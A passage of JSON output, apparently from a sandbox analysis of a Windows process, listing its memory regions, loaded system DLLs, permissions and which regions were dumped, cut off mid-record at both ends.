"c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:00:31.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1186", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:00:31.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001187-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1187", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:00:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001188-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:00:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1189", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:31.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:31.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 5537791, "entry_point": 0, "filename": null, "id": "region_1191", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:00:31.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1192", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:00:31.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1193", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:00:31.473", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001194-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1194", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:31.480", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001195-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1195", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:31.480", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001196-addr_0x0000000000190000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1703935, "entry_point": 0, "filename": null, "id": "region_1196", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:31.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7671807, "entry_point": 0, "filename": null, "id": "region_1197", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:00:31.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 11726847, "entry_point": 8781824, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1198", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 8781824, "timestamp": "00:00:31.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1199", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:00:31.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952776192, "type": "region", "version": 1 }, "end_va": 1953300479, "entry_point": 1952856009, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1200", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952776192, "timestamp": "00:00:31.485", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001201-addr_0x0000000002000000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1201", "name": "private_0x0000000002000000", "norm_filename": null, "region_type": "private_memory", "start_va": 33554432, "timestamp": "00:00:31.487", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 34467839, "entry_point": 0, "filename": null, "id": "region_1202", "name": "pagefile_0x0000000002000000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33554432, "timestamp": "00:00:31.489", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001203-addr_0x00000000021c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1203", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:00:31.489", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001204-addr_0x00000000000e0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:31.502", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001205-addr_0x0000000000100000-size_0x000000000000e000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1105919, "entry_point": 0, "filename": null, "id": "region_1205", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:31.504", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001206-addr_0x0000000002200000-size_0x00000000003d1000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4001792, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 39653375, "entry_point": 0, "filename": null, "id": "region_1206", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:00:31.509", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001207-addr_0x0000000000110000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1171455, "entry_point": 0, "filename": null, "id": "region_1207", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:31.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001208-addr_0x0000000000130000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1310719, "entry_point": 0, "filename": null, "id": "region_1208", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:31.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001209-addr_0x00000000025e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39714816, "type": "region", "version": 1 }, "end_va": 40763391, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x00000000025e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39714816, "timestamp": "00:00:31.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1975844864, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1210", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:00:32.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972174848, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1211", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:00:33.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1212", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:00:33.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992556544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1213", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:00:33.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1214", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:00:33.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961623552, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1215", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:00:33.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1958412288, "type": "region", "version": 1 }, "end_va": 1958506495, "entry_point": 1958412288, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_1216", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1958412288, "timestamp": "00:00:33.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958391807, "entry_point": 1958346752, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1217", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:00:33.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958334463, "entry_point": 1958281216, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_1218", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:00:33.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1219", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:33.643", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001220-addr_0x0000000002160000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35258367, "entry_point": 0, "filename": null, "id": "region_1220", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:00:33.643", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001221-addr_0x0000000002200000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 36700159, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:00:33.644", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001222-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1222", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:33.644", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001223-addr_0x0000000000150000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1223", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:39.698", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001224-addr_0x00000000001e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1224", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:39.698", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001225-addr_0x00000000023e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 37879807, "entry_point": 0, "filename": null, "id": "region_1225", "name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:00:39.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001226-addr_0x0000000002440000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 39059455, "entry_point": 0, "filename": null, "id": "region_1226", "name": "private_0x0000000002440000", "norm_filename": null, "region_type": "private_memory", "start_va": 38010880, "timestamp": "00:00:39.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001227-addr_0x00000000027d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 42795007, "entry_point": 0, "filename": null, "id": "region_1227", "name": "private_0x00000000027d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41746432, "timestamp": "00:00:39.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001228-addr_0x0000000002a10000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 45154303, "entry_point": 0, "filename": null, "id": "region_1228", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:00:39.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001229-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_1229", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:39.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001230-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:39.701", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001231-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1231", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:39.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_1232", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:39.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1947533312, "type": "region", "version": 1 }, "end_va": 1949229055, "entry_point": 1947533312, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1233", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1947533312, "timestamp": "00:00:39.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 1769472, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1234", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:00:39.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_1235", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:00:39.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1236", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:39.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001237-addr_0x0000000002370000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 37421055, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:00:39.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001238-addr_0x0000000002ca0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 46792704, "type": "region", "version": 1 }, "end_va": 47841279, "entry_point": 0, "filename": null, "id": "region_1238", "name": "private_0x0000000002ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46792704, "timestamp": "00:00:39.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1988755456, "type": "region", "version": 1 }, "end_va": 1988915199, "entry_point": 1988755456, "filename": "\\Windows\\SysWOW64\\cfgmgr32.dll", "id": "region_1239", "name": 